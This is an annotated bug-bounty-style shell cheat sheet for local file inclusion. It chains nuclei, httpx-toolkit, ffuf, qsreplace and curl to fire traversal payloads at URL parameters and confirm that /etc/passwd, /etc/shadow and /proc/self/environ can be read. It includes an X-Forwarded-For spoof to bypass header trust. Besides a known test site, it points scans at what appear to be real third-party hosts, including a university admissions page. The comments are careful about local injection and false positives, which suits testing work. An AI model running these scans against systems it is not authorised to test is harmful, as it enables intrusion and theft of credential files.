Local file inclusion (LFI)
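# Stage 1: run the nuclei DAST LFI templates against every URL in check.txt.
# -fm single overrides the fuzzing mode set in the templates.
# X-Forwarded-For: 127.0.0.1 makes the request look locally originated to any
# component that trusts that header; a server should honour it only when it
# arrives from a known proxy.
nuclei -dast \
  -t /root/.local/nuclei-templates/dast/vulnerabilities/lfi/ \
  -H "User-Agent: ..." \
  -H "X-Forwarded-For: 127.0.0.1" \
  -fm single < check.txt

# Stage 2: cut each URL back to its first '=', let httpx-toolkit append the
# entries of /lfi.txt, and keep the first response per URL whose body matches
# the passwd-style regex. Hits go to lfi_hits.txt.
# The URL reaches the inner shell as "$1" rather than being pasted into the
# sh -c string: check.txt is untrusted data, and a line containing $(...) or
# ';' would otherwise run as a command on the workstation doing the scan.
sed 's/=.*/=/' check.txt \
  | xargs -P 20 -I {} sh -c 'printf "%s\n" "$1" | httpx-toolkit -paths /lfi.txt -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:" -silent | head -n 1' _ {} \
  > lfi_hits.txt &&
  # Stage 3: fetch every hit again with curl and record only the URLs whose
  # body still carries a root passwd entry.
  # curl -k skips certificate verification, so the answering host is not
  # authenticated; anything recorded here is worth re-checking without -k.
  # confirmed_lfi.txt lists URLs that disclose system files and should be
  # stored as sensitive finding data.
  while IFS= read -r url; do
    printf '%s ... ' "$url"
    if curl -s -k --max-time 10 "$url" | grep -q "root:[x*$][^:]*:0:0:"; then
      printf '\033[1;32mCONFIRMED\033[0m\n'
      printf '%s\n' "$url" >> confirmed_lfi.txt
    else
      printf '\033[1;31mFAILED\033[0m\n'
    fi
  done < lfi_hits.txt

# Check All Paths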
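# For every hit in lfi_hits.txt, swap the literal "/etc/passwd" in the URL for
# each path in the list and classify the response:
#   CONFIRMED - the body matches the signature for passwd, shadow or environ
#   BLOCKED   - the body contains one of the listed error strings
#   SAFE      - nothing matched
# Only three of the eleven paths have a signature, so SAFE is the default
# outcome for the other eight and is not evidence that the file was unreadable.
# The bare word "Error" also matches ordinary application error pages, so
# BLOCKED can be a false label too.
# Response bodies (including any /etc/shadow content) are held in a variable
# only; just the URL is appended to confirmed_lfi.txt.
# curl -k skips certificate verification, so the answering host is not
# authenticated.
while IFS= read -r url; do
  for path in "/etc/passwd" "/etc/shadow" "/etc/shells" "/etc/group" "/etc/profile" "/etc/hosts" "/proc/self/environ" "/proc/self/status" "/proc/mounts" "/proc/version" "/bin/sh"; do
    modified_url="${url/\/etc\/passwd/$path}"

    # If the hit does not contain a literal /etc/passwd (for example an encoded
    # form), the substitution is a no-op. Request the URL once for the passwd
    # check instead of repeating the same request under ten other labels.
    if [[ "$modified_url" == "$url" && "$path" != "/etc/passwd" ]]; then
      continue
    fi

    printf '%s ... ' "$modified_url"
    response=$(curl -s -k --max-time 10 "$modified_url")

    # Pick the content signature for this path; empty means "no signature".
    case "$path" in
      /etc/passwd) signature="root:[x*$][^:]*:0:0:" ;;
      /etc/shadow) signature="root:\$[0-9]\$[a-zA-Z0-9]" ;;
      /proc/self/environ) signature="USER=\|PATH=" ;;
      *) signature="" ;;
    esac

    if [[ -n "$signature" ]] && grep -q -- "$signature" <<<"$response"; then
      printf '\033[1;32mCONFIRMED\033[0m\n'
      printf '%s\n' "$modified_url" >> confirmed_lfi.txt
    elif grep -q "Permission denied\|No such file\|Forbidden\|Error" <<<"$response"; then
      printf '\033[1;33mBLOCKED\033[0m\n'
    else
      printf '\033[1;31mSAFE\033[0m\n'
    fi
  done
done < lfi_hits.txt

# Single-URL variant: cut the URL back to its first '=' and let httpx-toolkit
# append the entries of /lfi.txt, printing responses with status 200 whose
# body matches the passwd-style regex.
# -random-agent varies the User-Agent per request, so log review for this
# traffic should key on the requested parameter values, not the agent string.
printf '%s\n' "https://mylocal.life/index.php?page=" \
  | sed 's/=.*/=/' \
  | httpx-toolkit -paths /lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"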
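# ffuf variant: cut the URL back to its first '=', set the query value to the
# FUZZ keyword with qsreplace, de-duplicate, and have ffuf substitute every
# entry of /lfi.txt, reporting responses that match the passwd-style regex.
# read -r keeps backslashes in the URL intact. "$urls" is quoted so that a URL
# containing '&', '*' or whitespace reaches ffuf as one argument instead of
# being split or glob-expanded by the shell.
printf '%s\n' "http://testphp.vulnweb.com/showimage.php?file=" \
  | sed 's/=.*/=/' \
  | qsreplace "FUZZ" \
  | sort -u \
  | while IFS= read -r urls; do
      ffuf -u "$urls" -w /lfi.txt -c -mr "root:(x|\*|\$[^\:]*):0:0:" -v
    done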
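# Quick single-parameter check: qsreplace sets the query value to /etc/passwd,
# curl fetches the result, and the URL is printed when the body contains
# "root:x".
# "root:x" is a loose marker: any page that happens to contain that text
# counts as a hit, so a "VULN!" line is a lead to verify, not a confirmed
# finding.
# The URL is handed to the inner shell as "$1" rather than substituted into
# the sh -c string, so shell metacharacters in a URL are never executed
# locally.
printf '%s\n' "https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=2" \
  | qsreplace "/etc/passwd" \
  | xargs -I% -P 25 sh -c 'curl -s "$1" 2>&1 | grep -q "root:x" && echo "VULN! $1"' _ %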